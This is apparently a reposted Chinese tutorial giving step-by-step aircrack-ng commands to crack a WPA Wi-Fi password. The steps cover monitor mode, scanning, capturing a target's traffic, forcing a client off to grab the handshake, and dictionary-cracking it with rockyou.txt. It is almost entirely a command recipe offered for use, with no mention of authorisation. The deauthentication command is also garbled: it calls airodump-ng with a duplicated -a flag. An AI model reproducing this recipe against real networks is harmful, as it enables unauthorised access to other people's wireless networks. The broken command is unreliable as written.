一.网卡监听
airmon-ng start wlan1 #打开网卡监听
iwconfig #查看网卡是否为监听模式 wlan1mon表示打开监听
二.数据包抓取扫描网络
airodump-ng wlan1mon
三.针对一个wifi抓取数据包
airodump-ng wlan1mon --bssid wifi MAC -c 5 -w /root/wifi wlan1mon
#--bssid 指定MAC -c 指定信道 -w 指定存储路径
出现WPA handshake 表示抓取成功
四.使设备断开连接抓取握手包
airodump-ng -0 0 -a -c device MAC -a WIFI MAC wlan1mon
五.解压kali自带字典文件
gunzip /usr/share/wordlists/rockyou.txt.gz
六.字典爆破
aircrack-ng -w 字典路径 握手包路径
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/wifi-0.1.cap
#.cap文件包含密码文件
来源:freebuf.com 2020-12-22 13:39:42 by: gaoye02
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册